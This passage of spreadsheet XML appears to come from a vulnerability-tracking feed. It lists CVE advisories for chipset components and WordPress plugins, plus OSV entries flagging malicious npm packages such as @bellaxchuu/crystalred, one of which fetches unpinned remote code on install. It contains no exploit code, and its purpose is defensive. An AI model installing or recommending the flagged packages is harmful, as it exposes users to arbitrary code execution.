          <t>In aidl, there is a possible escalation of privilege due to a missing permission check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11185216; Issue ID: MSV-9039.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20535</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20536</t>
        </is>
      </c>
      <c r="D109" s="5" t="inlineStr"/>
      <c r="E109" s="5" t="inlineStr"/>
      <c r="F109" s="5" t="inlineStr"/>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr"/>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>In aidl, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11242428; Issue ID: MSV-9038.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20536</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20537</t>
        </is>
      </c>
      <c r="D110" s="5" t="inlineStr"/>
      <c r="E110" s="5" t="inlineStr"/>
      <c r="F110" s="5" t="inlineStr"/>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr"/>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>In aidl, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11185225; Issue ID: MSV-9024.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20537</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20538</t>
        </is>
      </c>
      <c r="D111" s="5" t="inlineStr"/>
      <c r="E111" s="5" t="inlineStr"/>
      <c r="F111" s="5" t="inlineStr"/>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds read due to a missing permission check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01774038; Issue ID: MSV-8914.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20538</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20539</t>
        </is>
      </c>
      <c r="D112" s="5" t="inlineStr"/>
      <c r="E112" s="5" t="inlineStr"/>
      <c r="F112" s="5" t="inlineStr"/>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01774038; Issue ID: MSV-8913.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20539</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20540</t>
        </is>
      </c>
      <c r="D113" s="5" t="inlineStr"/>
      <c r="E113" s="5" t="inlineStr"/>
      <c r="F113" s="5" t="inlineStr"/>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds read due to a missing bounds check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01774038; Issue ID: MSV-8912.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20540</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20541</t>
        </is>
      </c>
      <c r="D114" s="5" t="inlineStr"/>
      <c r="E114" s="5" t="inlineStr"/>
      <c r="F114" s="5" t="inlineStr"/>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible out of bounds read due to a missing permission check. This could lead to remote denial of service, if a UE has connected to a rogue base station controlled by the attacker, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01774038; Issue ID: MSV-8911.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20541</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20542</t>
        </is>
      </c>
      <c r="D115" s="5" t="inlineStr"/>
      <c r="E115" s="5" t="inlineStr"/>
      <c r="F115" s="5" t="inlineStr"/>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>In apusys, there is a possible memory corruption due to use after free. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11076799; Issue ID: MSV-8143.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20542</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20543</t>
        </is>
      </c>
      <c r="D116" s="5" t="inlineStr"/>
      <c r="E116" s="5" t="inlineStr"/>
      <c r="F116" s="5" t="inlineStr"/>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-215</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>In Modem, there is a possible information disclosure due to a logic error. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01645293; Issue ID: MSV-6761.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20543</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20544</t>
        </is>
      </c>
      <c r="D117" s="5" t="inlineStr"/>
      <c r="E117" s="5" t="inlineStr"/>
      <c r="F117" s="5" t="inlineStr"/>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>In meta, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege, if an attacker has physical access to the device, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS11049530 / ALPS11480843; Issue ID: MSV-7935.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20544</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20579</t>
        </is>
      </c>
      <c r="D118" s="5" t="inlineStr"/>
      <c r="E118" s="5" t="inlineStr"/>
      <c r="F118" s="5" t="inlineStr"/>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11383899; Issue ID: MSV-9800.</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20579</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20586</t>
        </is>
      </c>
      <c r="D119" s="5" t="inlineStr"/>
      <c r="E119" s="5" t="inlineStr"/>
      <c r="F119" s="5" t="inlineStr"/>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS11383899; Issue ID: MSV-9614.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20586</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20587</t>
        </is>
      </c>
      <c r="D120" s="5" t="inlineStr"/>
      <c r="E120" s="5" t="inlineStr"/>
      <c r="F120" s="5" t="inlineStr"/>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>In mtee, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11383899; Issue ID: MSV-9608.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20587</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20588</t>
        </is>
      </c>
      <c r="D121" s="5" t="inlineStr"/>
      <c r="E121" s="5" t="inlineStr"/>
      <c r="F121" s="5" t="inlineStr"/>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>In mtee, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11383899; Issue ID: MSV-9607.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20588</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20589</t>
        </is>
      </c>
      <c r="D122" s="5" t="inlineStr"/>
      <c r="E122" s="5" t="inlineStr"/>
      <c r="F122" s="5" t="inlineStr"/>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>In venc, there is a possible out of bounds write due to type confusion. This could lead to local escalation of privilege if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11383899; Issue ID: MSV-9606.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20589</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78371</t>
        </is>
      </c>
      <c r="D123" s="5" t="inlineStr"/>
      <c r="E123" s="5" t="inlineStr"/>
      <c r="F123" s="5" t="inlineStr"/>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr"/>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>The File Uploads Addon for WooCommerce WordPress plugin before 1.7.6 does not verify that the person requesting a customer-uploaded file is the customer who uploaded it, allowing unauthenticated attackers who know or guess a file's name to download other customers' uploaded files.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78371</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84169</t>
        </is>
      </c>
      <c r="D124" s="5" t="inlineStr"/>
      <c r="E124" s="5" t="inlineStr"/>
      <c r="F124" s="5" t="inlineStr"/>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr"/>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>The UPI QR Code Payment Gateway WordPress plugin through 1.4.3 does not verify that a payment-confirmation request actually belongs to the order and customer it claims to confirm, allowing unauthenticated attackers to mark an arbitrary order as paid without making any payment.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84169</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17343</t>
        </is>
      </c>
      <c r="D125" s="5" t="inlineStr"/>
      <c r="E125" s="5" t="inlineStr"/>
      <c r="F125" s="5" t="inlineStr"/>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr">
        <is>
          <t>npm:@bellaxchuu/crystalred</t>
        </is>
      </c>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr"/>
      <c r="S125"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
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (db80e6c4fd1d63c2fd93dd289e6a09d2e17d90e1472a6e172b453a213d63ee01)
package.json declares the `libsignal` dependency as `github:Bellaxata/libsignal-node` with no commit SHA, tag, or semver pin. On `npm install`, this resolves to the current HEAD of that GitHub repository and executes whatever lifecycle scripts and code that repo ships at fetch time. Because the source is off-registry and integrity-unchecked, the executed code can change at any moment without a version bump of @bellaxchuu/crystalred, giving the account controlling Bellaxata/libsignal-node arbitrary code execution on any machine installing this package.
</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17343</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17383</t>
        </is>
      </c>
      <c r="D126" s="5" t="inlineStr"/>
      <c r="E126" s="5" t="inlineStr"/>
      <c r="F126" s="5" t="inlineStr"/>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr">
        <is>
          <t>npm:@xatancchii/velycxbail</t>
        </is>
      </c>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
